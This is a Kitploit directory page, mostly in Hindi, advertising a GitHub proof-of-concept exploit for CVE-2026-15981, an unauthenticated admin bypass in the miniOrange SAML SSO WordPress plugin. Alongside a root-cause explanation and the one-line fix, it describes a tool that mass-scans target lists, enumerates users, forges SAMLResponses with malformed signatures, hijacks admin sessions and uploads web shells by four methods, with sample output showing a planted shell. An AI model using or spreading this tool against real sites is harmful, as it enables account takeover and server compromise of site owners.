Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-15981 — SAML सिंगल साइन ऑन <= 5.4.4 - अनऑथेंटिकेटेड प्रमाणीकरण बायपास SAMLResponse पैरामीटर के माध्यम से | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-15981
प्रमाणीकरण और प्राधिकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2026-15981

CVE-2026-15981

SAML सिंगल साइन ऑन <= 5.4.4 - अनऑथेंटिकेटेड प्रमाणीकरण बायपास SAMLResponse पैरामीटर के माध्यम से

रिपॉजिटरी देखें
152 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-15981

SAML Single Sign On <= 5.4.4 - बिना प्रमाणीकरण के SAMLResponse पैरामीटर के माध्यम से प्रमाणीकरण बाईपास

CVE CVSS CWE CWE Python

CVE-2026-15981

SAML Single Sign On ≤ 5.4.4 — बिना प्रमाणीकरण के प्रमाणीकरण बाईपास

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट
दूषित हस्ताक्षर → openssl_verify() लौटाता है -1 → PHP ढीला कास्ट true → wp_set_auth_cookie() व्यवस्थापक के रूप में


भेद्यता अवलोकन

फ़ील्डविवरण
CVE IDCVE-2026-15981
प्रभावित प्लगइनminiOrange SAML 2.0 Single Sign On – SSO Login (WordPress)
प्रभावित संस्करणसभी संस्करण 5.4.4 तक और इसमें शामिल
प्रकारबिना प्रमाणीकरण के प्रमाणीकरण बाईपास
CWECWE-287: अनुचित प्रमाणीकरण / CWE-305: प्राथमिक कमजोरी द्वारा प्रमाणीकरण बाईपास
CVSS 3.19.8 क्रिटिकल — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
प्रमाणीकरणकोई आवश्यक नहीं

विवरण

WordPress के लिए SAML Single Sign On – SSO Login प्लगइन सभी संस्करणों में 5.4.4 तक और इसमें शामिल, प्रमाणीकरण बाईपास के लिए असुरक्षित है। इसका कारण mo_saml_validate_signature() फ़ंक्शन PHP के openssl_verify() द्वारा लौटाए गए कच्चे ट्राई-स्टेट पूर्णांक पर ढीला बूलियन जाँच करना है, जिससे त्रुटि वापसी मान -1 को सत्य माना जाता है और इसलिए सफल हस्ताक्षर सत्यापन के रूप में व्यवहार किया जाता है।

यह बिना प्रमाणीकृत हमलावरों के लिए किसी भी मौजूदा WordPress उपयोगकर्ता, व्यवस्थापकों सहित, के रूप में लॉग इन करना संभव बनाता है, एक निर्मित SAMLResponse प्रस्तुत करके जिसमें हमलावर-नियंत्रित NameID और एक जानबूझकर दूषित हस्ताक्षर मान होता है जो OpenSSL प्रसंस्करण त्रुटि को ट्रिगर करता है — सत्यापन को पूरी तरह से बाईपास करता है और लक्षित खाते के लिए wp_set_auth_cookie() को कॉल किया जाता है।

मूल कारण

हमलावर निर्मित SAMLResponse भेजता है
         │
         ▼
mo_saml_validate_signature()
         │
         ▼
openssl_verify($data, $malformed_sig, $key)
         │
         ├─ लौटाता है  1  → वैध हस्ताक्षर      ✓
         ├─ लौटाता है  0  → अमान्य हस्ताक्षर     ✗
         └─ लौटाता है -1  → OpenSSL आंतरिक त्रुटि
                │
                ▼
     PHP ढीली तुलना:  if ($result)
                │
                ├─ (int) 1   → true   ✓
                ├─ (int) 0   → false  ✓
                └─ (int) -1  → true   ← बग: त्रुटि को सफलता माना गया
                       │
                       ▼
             wp_set_auth_cookie() कॉल किया गया
                       │
                       ▼
             हमलावर अब व्यवस्थापक है

फिक्स तुच्छ है — if ($result === 1) के बजाय if ($result) — लेकिन दोष का प्रभाव पूर्ण प्रमाणीकरण बाईपास है।


विशेषताएं

  • मल्टी-टार्गेट मास स्कैनिंग — लक्ष्य सूचियों का समवर्ती प्रसंस्करण
  • पूर्ण WordPress फिंगरप्रिंटिंग — आगे बढ़ने से पहले WordPress की पुष्टि करता है
  • प्लगइन पहचान और संस्करण जाँच — miniOrange SAML SSO की पहचान करता है और संस्करण ≤ 5.4.4 को मान्य करता है
  • SP मेटाडेटा खोज — ?option=mosaml_metadata से Entity ID और ACS URL निकालता है
  • व्यापक उपयोगकर्ता गणना:
    • WP REST API (/wp-json/wp/v2/users)
    • प्रति-आईडी REST क्वेरी (आईडी 1–10)
    • लेखक संग्रह रीडायरेक्ट (/?author=N)
    • HTML बॉडी पैटर्न मिलान
    • डोमेन-आधारित फ़ॉलबैक + सामान्य व्यवस्थापक नाम
  • IdP जारीकर्ता खोज — ?option=saml_user_login रीडायरेक्ट का अनुसरण करता है और IdP बेस URL निकालता है
  • SAMLResponse जालसाज़ी इंजन:
    • lxml के माध्यम से उचित Exclusive C14N कैनोनिकलाइज़ेशन
    • सही डाइजेस्ट गणना (SHA-1/SHA-256/SHA-384/SHA-512)
    • SAML विनिर्देश के अनुसार </Issuer> के बाद हस्ताक्षर तत्व इंजेक्शन
    • openssl_verify() = -1 को ट्रिगर करने के लिए डिज़ाइन किए गए 12+ दूषित हस्ताक्षर पेलोड
    • उपयोगकर्ताओं × जारीकर्ताओं × एल्गोरिदम × हस्ताक्षर × दर्शक फ़्लैग × SP एंटिटी आईडी पर पुनरावृति करता है
  • सत्र सत्यापन — प्रत्येक प्रयास के बाद wordpress_logged_in_* कुकी की जाँच करता है
  • व्यवस्थापक भूमिका पुष्टि — /wp-admin/, /wp-admin/users.php, /wp-admin/plugins.php तक पहुँच सत्यापित करता है
  • प्रोफ़ाइल निष्कर्षण — /wp-admin/profile.php से उपयोगकर्ता नाम और ईमेल पढ़ता है
  • व्यवस्थापक सत्र पर 4 शेल अपलोड विधियाँ:
    • M1 — plugin-install.php के माध्यम से प्लगइन ZIP अपलोड
    • M2 — /wp-json/wp/v2/plugins के माध्यम से REST API प्लगइन अपलोड
    • M3 — थीम/प्लगइन संपादक फ़ाइल लेखन
    • M4 — मीडिया एसिंक अपलोड
  • शेल निष्पादन सत्यापन — प्रतिक्रिया बॉडी में Nx-zD हस्ताक्षर की पुष्टि करता है
  • डायग्नोस्टिक इंजन — विफलता कारणों को वर्गीकृत करता है (DIGEST_FAIL, ISSUER, AUDIENCE, TIME, आदि)
  • डीबग JSON आउटपुट — विश्लेषण के लिए पूर्ण प्रति-लक्ष्य डायग्नोस्टिक लॉग

आवश्यकताएँ

Python >= 3.8
pip install requests lxml

lxml SAML Assertion के उचित Exclusive C14N कैनोनिकलाइज़ेशन के लिए आवश्यक है।


उपयोग

python CVE-2026-15981.py

आपसे निम्नलिखित के लिए संकेत दिया जाएगा:

संकेतविवरणडिफ़ॉल्ट
लक्ष्य फ़ाइलएक टेक्स्ट फ़ाइल का पथ जिसमें प्रति पंक्ति एक लक्ष्य होlist.txt
थ्रेड्ससमवर्ती कार्यकर्ताओं की संख्या (1–100)5

लक्ष्य फ़ाइल स्वरूप

https://example.com
http://target.org
subdomain.example.net
192.168.1.100
https://example.com/wordpress

प्रति पंक्ति एक URL. यदि कोई योजना निर्दिष्ट नहीं है तो HTTP डिफ़ॉल्ट रूप से उपयोग किया जाता है।


आउटपुट

टर्मिनल

  ███████╗███╗   ███╗███████╗
  ██╔════╝████╗ ████║██╔════╝
  ███████╗██╔████╔██║███████╗
  ╚════██║██║╚██╔╝██║╚════██║
  ███████║██║ ╚═╝ ██║███████║
  ╚══════╝╚═╝     ╚═╝╚══════╝
   ╔══════════════════════════════════════════════════════════╗
   ║  miniOrange SAML SSO <= 5.4.4                           ║
   ║  openssl_verify() -1 Bypass -> Admin Session            ║
   ╚══════════════════════════════════════════════════════════╝
  By: Nxploited ( Khaled Alenazi ) - Nxploited ZeroDay Hub
  T.m @Kxploit

प्रत्येक लक्ष्य 7 लेबल वाले चरणों के माध्यम से आगे बढ़ता है:

  ============================================================
    target.com
  ============================================================
  [1] WordPress
      पुष्टि हुई
  [2] SAML प्लगइन
      संस्करण: 5.4.4
      miniOrange SAML मिला
  [3] SP मेटाडेटा
      मेटाडेटा entityID: https://target.com/...
      मेटाडेटा ACS: https://target.com/
  [4] उपयोगकर्ता
      REST: admin (id=1)
      REST: editor (id=2)
      author/3: johndoe
      4 मिले: ['admin', 'editor', 'johndoe', 'target']
  [5] जारीकर्ता
      SSO रीडायरेक्ट मिला
      3 उम्मीदवार
  [6] एक्सप्लॉइट
      कुकी! #14 user=admin 0xFF*256/rsa-sha256
        wordpress_logged_in_abc123=admin%7C1753...
        wp-admin पहुँच योग्य
          user=admin  [email protected]
          users.php -> Admin
  [7] शेल अपलोड
      M1: प्लगइन अपलोड हुआ
      SHELL (M1-plugin): https://target.com/wp-content/plugins/nxproof/Nx.php
        -> Nx-zD Linux target 6.1.0 x86_64 uid=33(www-data) ...

  +==========================================================+
  |  व्यवस्थापक सत्र पुष्ट हुआ                               |
  +==========================================================+
  |  Target : https://target.com
  |  User   : admin
  |  Issuer : https://idp.example.com/simplesaml/...
  |  Method : 0xFF*256/rsa-sha256
  |  Cookie : wordpress_logged_in_abc123=admin%7C1753...
  |  Shell  : https://target.com/wp-content/plugins/nxproof/Nx.php
  +==========================================================+

परिणाम फ़ाइलें

टूल डाउनलोड करें